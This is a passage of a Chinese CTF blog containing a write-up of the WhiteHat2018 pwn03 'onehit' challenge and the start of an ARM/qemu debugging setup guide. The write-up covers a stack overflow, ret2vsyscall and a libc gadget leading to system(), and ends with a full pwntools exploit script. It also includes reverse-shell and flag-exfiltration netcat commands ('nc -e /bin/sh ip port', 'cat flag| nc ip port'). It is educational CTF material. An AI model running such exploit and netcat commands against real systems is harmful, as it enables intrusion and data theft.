</span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> file ~/libc-database/db/libc6_2.27-3ubuntu1_amd64.so /home/m4x/libc-database/db/libc6_2.27-3ubuntu1_amd64.so: ELF 64-bit LSB pie executable x86-64, version <span class="m">1</span> <span class="o">(</span>GNU/Linux<span class="o">)</span>, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID<span class="o">[</span>sha1<span class="o">]=</span>b417c0ba7cc5cf06d1d1bed6652cedb9253c60d0, <span class="k">for</span> GNU/Linux 3.2.0, stripped WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> file ./libc-2.27.so ./libc-2.27.so: ELF 64-bit LSB pie executable x86-64, version <span class="m">1</span> <span class="o">(</span>GNU/Linux<span class="o">)</span>, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID<span class="o">[</span>sha1<span class="o">]=</span>b417c0ba7cc5cf06d1d1bed6652cedb9253c60d0, <span class="k">for</span> GNU/Linux 3.2.0, stripped WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> diff libc-2.27.so ~/libc-database/db/libc6_2.27-3ubuntu1_amd64.so 二进制文件 libc-2.27.so 和 /home/m4x/libc-database/db/libc6_2.27-3ubuntu1_amd64.so 不同 </code></pre></td></tr></table> </div> </div><p>这里我用的是 hexdiff <img src="http://ww1.sinaimg.cn/large/006AWYXBly1funfoxn9cwj30ql0qd0y4.jpg" alt=""></p> <p>只有这一处是不同的, IDA 中可以看出此处的功能相当于 <code>add rsi 127; jmp system</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">.text:000000000004F43A add rdi, 7Fh .text:000000000004F43E jmp short loc_4F45B .text:000000000004F45B loc_4F45B: ; CODE XREF: sub_4F360+DE↑j .text:000000000004F45B call sub_4EEB0 .text:000000000004F460 test eax, eax .text:000000000004F462 setz al .text:000000000004F465 add rsp, 8 .text:000000000004F469 movzx eax, al .text:000000000004F46C retn __int64 __fastcall system(__int64 a1) { __int64 result; // rax if ( a1 ) result = sub_4EEB0(); else result = (unsigned int)sub_4EEB0() == 0; return result; } </code></pre></td></tr></table> </div> </div><p>暂时不知道这段 gadget 有什么用, 先看二进制程序, 发现在 echo 函数中存在漏洞</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">echo</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// ST0C_4 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-E4h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">216</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-E0h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+E8h] [rbp-8h] </span><span class="c1"></span> <span class="n">v3</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">v0</span> <span class="o">=</span> <span class="n">v1</span> <span class="o">+</span> <span class="mi">32</span><span class="p">;</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v0</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Echo machine: &#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">deleteyourevilstring</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>根据调试, read 时的长度 v0 是根据我们的输入决定的, 那么这里就存在一个栈溢出的漏洞, 有意思的是这道题的 stdin 和 stdout 也被关闭了, 根据现有的情况, 基本上溢出也只能利用一次了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">.text:0000000000000EFE mov rax, [rbp+var_8] .text:0000000000000F02 xor rax, fs:28h .text:0000000000000F0B jmp short locret_F12 .text:0000000000000F0D ; --------------------------------------------------------------------------- .text:0000000000000F0D call ___stack_chk_fail .text:0000000000000F12 ; --------------------------------------------------------------------------- .text:0000000000000F12 .text:0000000000000F12 locret_F12: ; CODE XREF: echo+A4↑j .text:0000000000000F12 leave .text:0000000000000F13 retn </code></pre></td></tr></table> </div> </div><p>查看 <code>call __stack_chk_fail</code> 附近的汇编, 发现虽然 checksec 检测有 canary, 但实际没起作用, 这样 canary 保护也就绕过了</p> <h4 id="step-1-1">Step 1:</h4> <p>我们先看一下在 echo 函数 ret 前寄存器和栈上的值</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">pwndbg&gt; 0x000055f1e44c0f13 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────── RAX 0xa54266585221bb65 RBX 0x0 RCX 0x7ff52b699910 ◂— mov rdx, qword ptr [rsi] RDX 0x676e6972747320 RDI 0x7ffd0eed2220 ◂— 0x676e6972747320 /* u&#39; string&#39; */ RSI 0x55f1e46c2020 ◂— 0x676e6972747320 /* u&#39; string&#39; */ R8 0xe R9 0x0 R10 0x8 R11 0x7ff52b7923c0 ◂— loopne 0x7ff52b792436 R12 0x55f1e44c0b50 ◂— xor ebp, ebp R13 0x7ffd0eed24c0 ◂— 0x1 R14 0x0 R15 0x0 RBP 0x6361616863616167 (&#39;gaachaac&#39;) RSP 0x7ffd0eed22f8 —▸ 0x55f1e44c0f69 ◂— nop RIP 0x55f1e44c0f13 ◂— ret ───────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────── 0x55f1e44c0efd nop 0x55f1e44c0efe mov rax, qword ptr [rbp - 8] 0x55f1e44c0f02 xor rax, qword ptr fs:[0x28] 0x55f1e44c0f0b jmp 0x55f1e44c0f12 ↓ 0x55f1e44c0f12 leave ► 0x55f1e44c0f13 ret &lt;0x55f1e44c0f69&gt; ↓ 0x55f1e44c0f69 nop 0x55f1e44c0f6a mov rax, qword ptr [rbp - 8] 0x55f1e44c0f6e xor rax, qword ptr fs:[0x28] 0x55f1e44c0f77 je 0x55f1e44c0f7e ↓ 0x55f1e44c0f7e leave ────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────── 00:0000│ rsp 0x7ffd0eed22f8 —▸ 0x55f1e44c0f69 ◂— nop 01:0008│ 0x7ffd0eed2300 ◂— 0x31 /* u&#39;1&#39; */ 02:0010│ 0x7ffd0eed2308 ◂— 0x0 ... ↓ pwndbg&gt; stack 25 00:0000│ rsp 0x7ffd0eed22f8 —▸ 0x55f1e44c0f69 ◂— nop 01:0008│ 0x7ffd0eed2300 ◂— 0x31 /* u&#39;1&#39; */ 02:0010│ 0x7ffd0eed2308 ◂— 0x0 ... ↓ 0e:0070│ 0x7ffd0eed2368 ◂— 0x7ff500000000 0f:0078│ 0x7ffd0eed2370 —▸ 0x55f1e44c1268 ◂— 0x63616d206f686345 (&#39;Echo mac&#39;) 10:0080│ 0x7ffd0eed2378 ◂— 0xc623073e3140da00 11:0088│ 0x7ffd0eed2380 ◂— 0x0 12:0090│ 0x7ffd0eed2388 —▸ 0x7ffd0eed23d0 —▸ 0x7ffd0eed23e0 —▸ 0x55f1e44c1060 ◂— push r15 13:0098│ 0x7ffd0eed2390 —▸ 0x55f1e44c0b50 ◂— xor ebp, ebp 14:00a0│ 0x7ffd0eed2398 —▸ 0x7ff52b632460 (system+32) ◂— test eax, eax 15:00a8│ 0x7ffd0eed23a0 —▸ 0x7ffd0eed24c0 ◂— 0x1 16:00b0│ 0x7ffd0eed23a8 —▸ 0x55f1e44c0fef ◂— nop 17:00b8│ 0x7ffd0eed23b0 ◂— 0x0 18:00c0│ 0x7ffd0eed23b8 ◂— 0x304e000000000000 pwndbg&gt; telescope $rdi 00:0000│ rdi 0x7ffd0eed2220 ◂— 0x676e6972747320 /* u&#39; string&#39; */ 01:0008│ 0x7ffd0eed2228 ◂— 0x6161616861616167 (&#39;gaaahaaa&#39;) 02:0010│ 0x7ffd0eed2230 ◂— 0x6161616a61616169 (&#39;iaaajaaa&#39;) 03:0018│ 0x7ffd0eed2238 ◂— 0x6161616c6161616b (&#39;kaaalaaa&#39;) 04:0020│ 0x7ffd0eed2240 ◂— 0x6161616e6161616d (&#39;maaanaaa&#39;) 05:0028│ 0x7ffd0eed2248 ◂— 0x616161706161616f (&#39;oaaapaaa&#39;) 06:0030│ 0x7ffd0eed2250 ◂— 0x6161617261616171 (&#39;qaaaraaa&#39;) 07:0038│ 0x7ffd0eed2258 ◂— 0x6161617461616173 (&#39;saaataaa&#39;) pwndbg&gt; </code></pre></td></tr></table> </div> </div><p>有两点值得注意:</p> <ol> <li>rdi + 8 到之后的很长一段都是可控的</li> <li>栈上有一个 system + 32 的地址 这样再结合之前 libc 上的 gadget <code>add rdi, 127; jmp system</code>, 就可以通过 partial overwrite 改写 system + 32 的低位为 gadget 的地址(调试验证此时只需改写最低位即可, 是可行的), 这样如果能控制 rip 为此 gadget 的地址, 就相当于控制了 system 的参数, 有了一次执行命令的机会</li> </ol> <h4 id="step-2-1">Step 2:</h4> <p>但问题出在 system + 32 在 <code>rsp + 0xa0</code> 这个位置, 我们需要控制 echo 函数返回到这里, 这个也好办, 用 ret2vsyscall 可以达到这个目的</p> <blockquote> <p>TLDR: 可以把 vsyscall 理解为一段固定地址和内容的 gadget, 用这段 gadget 填满栈, 可以实现 slide 的功能</p> </blockquote> <p>vsyscall 的地址可以直接用 vmmap 找到</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">pwndbg&gt; vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x55ef6a521000 0x55ef6a523000 r-xp 2000 0 /home/m4x/pwn_repo/WhiteHat2018_pwn03/onehit 0x55ef6a722000 0x55ef6a723000 r--p 1000 1000 /home/m4x/pwn_repo/WhiteHat2018_pwn03/onehit 0x55ef6a723000 0x55ef6a724000 rw-p 1000 2000 /home/m4x/pwn_repo/WhiteHat2018_pwn03/onehit 0x55ef6b8f7000 0x55ef6b918000 rw-p 21000 0 [heap] 0x7fe121ebd000 0x7fe1220a4000 r-xp 1e7000 0 /home/m4x/pwn_repo/WhiteHat2018_pwn03/libc-2.27.so 0x7fe1220a4000 0x7fe1222a4000 ---p 200000 1e7000 /home/m4x/pwn_repo/WhiteHat2018_pwn03/libc-2.27.so 0x7fe1222a4000 0x7fe1222a8000 r--p 4000 1e7000 /home/m4x/pwn_repo/WhiteHat2018_pwn03/libc-2.27.so 0x7fe1222a8000 0x7fe1222aa000 rw-p 2000 1eb000 /home/m4x/pwn_repo/WhiteHat2018_pwn03/libc-2.27.so 0x7fe1222aa000 0x7fe1222ae000 rw-p 4000 0 0x7fe1222ae000 0x7fe1222d3000 r-xp 25000 0 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fe1224d0000 0x7fe1224d2000 rw-p 2000 0 0x7fe1224d2000 0x7fe1224d3000 r--p 1000 24000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fe1224d3000 0x7fe1224d4000 rw-p 1000 25000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fe1224d4000 0x7fe1224d5000 rw-p 1000 0 0x7ffc925ca000 0x7ffc925eb000 rw-p 21000 0 [stack] 0x7ffc925ec000 0x7ffc925ef000 r--p 3000 0 [vvar] 0x7ffc925ef000 0x7ffc925f1000 r-xp 2000 0 [vdso] 0xffffffffff600000 0xffffffffff601000 r-xp 1000 0 [vsyscall] pwndbg&gt; x/5i 0xffffffffff600000 0xffffffffff600000: mov rax,0x60 0xffffffffff600007: syscall 0xffffffffff600009: ret 0xffffffffff60000a: int3 0xffffffffff60000b: int3 </code></pre></td></tr></table> </div> </div><p>这样通过 ret2vsyscall + partial overwrite, 我们就能控制 system 执行一次指令了</p> <h4 id="step-3-1">Step 3:</h4> <p>还要注意的是, 程序的 stdout 被关掉了, 这个和 0ctf2018 的 babystack 类似, 可以使用 <code>cat flag| nc ip port</code> 的方式在公网 vps 上监听到(<code>nc -l -p port</code>)</p> <p>或者使用 <code>nc -e ip port</code> 来建立一个反向 shell, 原理可以参考</p> <p><a href="https://xz.aliyun.com/t/2548">https://xz.aliyun.com/t/2548</a></p> <p><a href="https://xz.aliyun.com/t/2549">https://xz.aliyun.com/t/2549</a></p> <p>讲的很清楚</p> <p>但还有一个更简单的方法，使用 <code>sh flag;</code> 利用报错来拿到 flag</p> <h4 id="exp-1">exp</h4> <p>最终的 exp 如下, 其中的一些细节调试一遍会更加清楚</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="err"></span><span class="n">WhiteHat2018_pwn03</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha512</span> <span class="kn">import</span> <span class="nn">re</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s2">&#34;./onehit&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./onehit&#34;</span><span class="p">,</span> <span class="n">env</span> <span class="o">=</span> <span class="p">{</span><span class="s2">&#34;LD_PRELOAD&#34;</span><span class="p">:</span> <span class="s2">&#34;./libc-2.27.so&#34;</span><span class="p">})</span> <span class="c1"># io = remote(&#34;localhost&#34;, 9999)</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">(</span><span class="n">bps</span> <span class="o">=</span> <span class="p">[]):</span> <span class="n">cmd</span> <span class="o">=</span> <span class="s2">&#34;set follow-fork-mode parent</span><span class="se">\n</span><span class="s2">&#34;</span> <span class="n">base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s2">&#34;pmap {}| awk &#39;{{print $1}}&#39;&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">pid</span><span class="p">))</span><span class="o">.</span><span class="n">readlines</span><span class="p">()[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="n">cmd</span> <span class="o">+=</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s1">&#39;b *{:#x}</span><span class="se">\n</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">b</span> <span class="o">+</span> <span class="n">base</span><span class="p">)</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="n">bps</span><span class="p">])</span> <span class="n">cmd</span> <span class="o">+=</span> <span class="s2">&#34;c&#34;</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_interger</span><span class="p">():</span> <span class="n">prefix</span><span class="p">,</span> <span class="n">head</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="s1">&#39;&#34;([A-Z]+)&#34;.*0x([0-9a-f]+)&#39;</span><span class="p">,</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;The interger&#34;</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span> <span class="c1"># print prefix, head</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x1fffff</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span> <span class="k">if</span> <span class="n">sha512</span><span class="p">(</span><span class="n">prefix</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">))</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="n">head</span><span class="p">):</span> <span class="k">return</span> <span class="n">i</span> <span class="k">else</span><span class="p">:</span> <span class="n">log</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s2">&#34;Not Found!!!&#34;</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34; = &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">get_interger</span><span class="p">())</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;al?</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;N0</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">)</span> <span class="c1"># DEBUG([0xEA0, 0xE7F])</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;/bin/sh</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;1</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">)</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1"> .text:000000000004F43A add rdi, 7Fh </span><span class="s1"> .text:000000000004F43E jmp short loc_4F45B </span><span class="s1"> &#39;&#39;&#39;</span> <span class="n">vsyscall</span> <span class="o">=</span> <span class="mh">0xffffffffff600000</span> <span class="c1"># cmd = &#34;cat flag| nc ip port;&#34;</span> <span class="c1"># cmd = &#34;nc -e /bin/sh ip port;&#34;</span> <span class="n">cmd</span> <span class="o">=</span> <span class="s2">&#34;sh flag;&#34;</span> <span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x7f</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">+</span> <span class="n">cmd</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0xE0</span> <span class="o">+</span> <span class="mi">8</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">vsyscall</span><span class="p">)</span> <span class="o">*</span> <span class="mi">20</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\x3a</span><span class="s1">&#39;</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;available</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="c1"># pause()</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div> https://bash-c.github.io/post/how-2-pwn-an-arm-binary/ Tue, 31 Jul 2018 20:00:54 +0800 https://bash-c.github.io/post/how-2-pwn-an-arm-binary/ <p>这篇文章将以几道 CTF 题目为例讲解 pwn arm binary的一些问题</p> <h2 id="环境搭建">环境搭建</h2> <p>环境的搭建过程我之前写过, 这里偷个懒直接全文粘贴过来</p> <hr> <blockquote> <p>原文链接<a href="http://www.cnblogs.com/WangAoBo/p/debug-arm-mips-on-linux.html">M4x@10.0.0.55</a> 本文中用于展示的binary分别来自Jarvis OJ上pwn的add，typo两道题</p> </blockquote> <p>写这篇教程的主要目的是因为最近想搞其他系统架构的 pwn，因此第一步就是搭建环境了，网上搜索了一波，发现很多教程都是需要树莓派，芯片等硬件，然后自己编译 gdb，后来实践的过程中发现可以很简单地使用 qemu 实现运行和调试异架构 binary，因此在这里分享一下我的方法。</p> <h3 id="主机信息">主机信息：</h3> <p>以一台新装的 deepin 虚拟机(基于 debian)为例，详细信息如下：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5av617a5j30lq0bu78m.jpg" alt=""></p> <h3 id="预备环境安装">预备环境安装：</h3> <ul> <li>安装 git，gdb 和 gdb-multiarch</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ sudo apt-get update $ sudo apt-get install git gdb gdb-multiarch </code></pre></td></tr></table> </div> </div><ul> <li>安装 gdb 的插件 pwndbg（或者 gef 等支持多架构的插件）</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ git clone https://github.com/pwndbg/pwndbg $ <span class="nb">cd</span> pwndbg $ ./setup.sh </code></pre></td></tr></table> </div> </div><p>装好之后如图：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5c1vzla8j30nb04t75m.jpg" alt=""></p> <ul> <li> <p>安装pwntools，不必要，但绝对是写exp的神器</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ sudo pip install pwntools </code></pre></td></tr></table> </div> </div></li> </ul> <h3 id="安装qemu">安装qemu：</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ sudo apt-get install qemu-user $ sudo apt-get install qemu-use-binfmt qemu-user-binfmt:i386 </code></pre></td></tr></table> </div> </div><p>通过 qemu 模拟 arm/mips 环境，进而进行调试</p> <h3 id="安装共享库">安装共享库：</h3> <p>此时已经可以运行静态链接的 arm/mips binary 了，如下图：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5crjvp5dj31400p0ngj.jpg" alt=""></p> <p>但还不能运行动态链接的 binary，如下图：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5csjo38rj313o05i779.jpg" alt=""></p> <p>这就需要我们安装对应架构的共享库，可以通过如下命令搜索：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre 